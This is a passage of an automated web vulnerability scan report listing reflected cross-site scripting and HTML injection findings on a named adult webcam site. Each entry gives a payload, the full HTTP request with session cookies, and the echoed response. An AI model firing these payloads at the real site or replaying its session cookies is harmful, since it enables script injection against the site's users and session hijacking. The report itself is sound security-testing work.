Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:16 GMT
Connection: close
Content-Length: 33767
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/aroundthehouse.aspx&he=imlive.com&ul=/live-sex-chats/cams-aroundthehouse/?1145a'-alert(1)-'9eeece25a26=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.75. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/caught-on-cam/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f3af4"><a>c33137ced61 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/caught-on-cam/?f3af4"><a>c33137ced61=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:23:56 GMT
Connection: close
Content-Length: 26092
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a class="en" title="English" href="http://imlive.com/" onclick="dAccess('http://imlive.com/live-sex-chats/caught-on-cam/?f3af4"><a>c33137ced61=1');return false;" lang="en-US" hreflang="en-US">
...[SNIP]...

2.76. http://imlive.com/live-sex-chats/caught-on-cam/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/caught-on-cam/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb9d8'-alert(1)-'484051df056 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/caught-on-cam/?cb9d8'-alert(1)-'484051df056=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:24:19 GMT
Connection: close
Content-Length: 26239
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/caughtoncam.aspx&he=imlive.com&ul=/live-sex-chats/caught-on-cam/?cb9d8'-alert(1)-'484051df056=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.attachEvent != 'undefined'
...[SNIP]...

2.77. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7330d'-alert(1)-'69a435aad31 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/couple/?7330d'-alert(1)-'69a435aad31=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:18 GMT
Connection: close
Content-Length: 116890
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/couple/?7330d'-alert(1)-'69a435aad31=1&qs=cat=1^roomid=12^7330d'-alert(1)-'69a435aad31=1&qs=cat=1^roomid=12^7330d'-alert(1)-'69a435aad31=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.78. http://imlive.com/live-sex-chats/couple/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/couple/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f29d6"><a>e94ae201611 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/couple/?f29d6"><a>e94ae201611=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:09 GMT
Connection: close
Content-Length: 116726
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/couple/?f29d6"><a>e94ae201611=1">
...[SNIP]...

2.79. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload eb492'-alert(1)-'e05d7866c6a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/fetish/?eb492'-alert(1)-'e05d7866c6a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:57 GMT
Connection: close
Content-Length: 214380
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/hostlist.ashx&he=imlive.com&ul=/live-sex-chats/fetish/?eb492'-alert(1)-'e05d7866c6a=1&qs=cat=1^roomid=13^eb492'-alert(1)-'e05d7866c6a=1&qs=cat=1^roomid=13^eb492'-alert(1)-'e05d7866c6a=1&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eb
...[SNIP]...

2.80. http://imlive.com/live-sex-chats/fetish/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a68a0"><a>c6c73a2ee9a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/fetish/?a68a0"><a>c6c73a2ee9a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:21:45 GMT
Connection: close
Content-Length: 214124
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<a href="/live-sex-chats/fetish/?a68a0"><a>c6c73a2ee9a=1">
...[SNIP]...

2.81. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/categories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ceae9'-alert(1)-'1ae32c8a8a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /live-sex-chats/fetish/categories/?ceae9'-alert(1)-'1ae32c8a8a=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: prmntimlv=9ol5WGX0lgMWecNpzhu4OQy69cypaK85w%2bBYcXgawlLX4la11S5mkewZqGdAexR57%2bKTWRQFozGoXYPG03JKkR0X5B5vwn%2fXXwg%2bZduaZrk%3d; spvdr=vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&sgid=0&tid=0; __utmz=71081352.1296223202.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ix=s; ASPSESSIONIDCQDRCTSA=NFDNGHCBOBBONJIOIKOEFIMI; imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; BIGipServerImlive=2417231426.20480.0000; __utma=71081352.1111181414.1296223202.1296223202.1296223202.1; ASPSESSIONIDCARBBRTR=IJPDMBCBENILGHFNKKIEBJAM; __utmc=71081352; ASPSESSIONIDQQDBRBQD=OBDNIKCBLEIFDNLELECEOIGC; ASP.NET_SessionId=inmadwy2k4slzn55jrjeecn3; __utmb=71081352.4.10.1296223202;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
Set-Cookie: imlv=35loBStreEJN9OjJ4zzoIcezi5RLXqD%2bBy1VYBI3pSkXNUqoKMA%2f5sPQDZWzo8k3fESQFAUkBHI1uYbd5WPIAPcSw4MtKDUOnrBX9exkaOeEhsB5sVWVAXzALUVERyJ9KWQVFKyIwCAYp1RlMDQf0RD55146Nw6PCyPlOxZvWhqHaC3fEk48hGGsOjkZyqSxWJhM%2fSf8bs6wRlvXx1sFag%3d%3d; path=/
X-Powered-By: vsr48
Date: Fri, 28 Jan 2011 14:22:27 GMT
Connection: close
Content-Length: 25109
Vary: Accept-Encoding


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US" d
...[SNIP]...
<script type="text/javascript">try{var imgSrc='http://analytic.imlive.com/w.gif?c=121273&lr=1107816008&ud=0&pe=/fetish_category_sub.aspx&he=imlive.com&ul=/live-sex-chats/fetish/categories/?ceae9'-alert(1)-'1ae32c8a8a=1&qs=roomid=13&qs=roomid=13&bd=2257131737&sr=10098785&ee=YZSUSA5583&iy=dallas&id=44&iu=1&vd=24dcf686-5aa0-4b7e-99a3-76790d63eba3&ld=701';}catch(e){};function addEvent( obj, evt, fn ){if ( typeof obj.a
...[SNIP]...

2.82. http://imlive.com/live-sex-chats/fetish/categories/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://imlive.com
Path:   /live-sex-chats/fetish/categories/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a77"><a>b24d1216ef2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /live-sex-chats/fetish/categories/?c4a77"><a>b24d1216ef2=1 HTTP/1.1
Host: imlive.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
